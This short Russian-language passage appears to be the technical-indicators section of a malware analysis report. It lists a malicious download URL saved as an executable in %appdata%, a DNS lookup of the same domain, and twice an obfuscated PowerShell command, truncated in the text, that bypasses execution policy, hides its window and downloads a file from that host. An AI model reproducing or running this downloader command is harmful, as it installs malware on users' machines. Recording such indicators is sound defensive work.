Техническая информация
- http://mondayhelthc.top/read.php?f=404 как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "po^weRShelL^.E^X^e -EXe^CUtiON^p^ol^iC^y ^b^y^PASs^ -nO^ProfI^LE -w^iND^Ow^STYLE hIddEN^ ^(^NEw-^O^BjECT^ sYS^T^e^m^.NeT.^We^B^cliEN^t)^.d^Own^lO^Adfile(^'http://mondayhelthc.t...
- DNS ASK mo####helthc.top
- '<SYSTEM32>\cmd.exe' /C "po^weRShelL^.E^X^e -EXe^CUtiON^p^ol^iC^y ^b^y^PASs^ -nO^ProfI^LE -w^iND^Ow^STYLE hIddEN^ ^(^NEw-^O^BjECT^ sYS^T^e^m^.NeT.^We^B^cliEN^t)^.d^Own^lO^Adfile(^'http://mondayhelthc.t...' (со скрытым окном)